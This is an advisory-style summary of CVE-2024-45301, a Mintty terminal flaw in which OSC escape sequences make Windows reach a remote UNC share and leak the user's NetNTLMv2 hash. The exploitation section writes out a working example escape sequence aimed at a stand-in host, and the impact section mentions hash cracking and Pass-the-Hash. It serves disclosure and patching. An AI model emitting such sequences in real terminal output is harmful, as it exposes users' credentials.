CVE-2024-45301

Vulnerability

Overview

Mintty, a terminal emulator for Cygwin, MSYS2, and WSL, contains a vulnerability in its path conversion logic. Several escape sequences (including OSC 7773, OSC 440, OSC 11, OSC 7, and OSC 8) cause the mintty process to access a file at a specified path. The root cause is the use of an MSYS2 API that converts between POSIX and Windows paths and also checks for symbolic links, which triggers a network file access when an attacker-controlled UNC path is supplied [1].

Exploitation

An attacker can exploit this by simply printing a crafted escape sequence in a bash shell, for example \x1b]7773;//0.0.0.0/test\007. The victim does not need to click or interact further; merely displaying the sequence is sufficient. The mintty process then attempts to resolve the path, which causes the Windows operating system to negotiate an NTLM authentication with the attacker's remote host. This works because the path conversion API calls cygwin_conv_path and eventually path_conv::check, which invokes Windows APIs that connect to the specified network share [1].

Impact

A successful attack leaks the victim's NetNTLMv2 hash to the attacker. This hash can be used offline for password cracking with tools like hashcat or John the Ripper, or in a Pass-the-Hash attack to impersonate the victim on the network. The CVSS score is 5.3 (Medium), with high confidentiality impact but requiring user interaction (the victim must run a command that prints the escape sequence) and high attack complexity [1].

Mitigation

The vulnerability is fixed in Mintty version 3.7.5. Users should update to the latest version. No workarounds are documented, but avoiding untrusted input in terminal output can reduce risk. The same code path exists in Cygwin, which may also be theoretically vulnerable [1].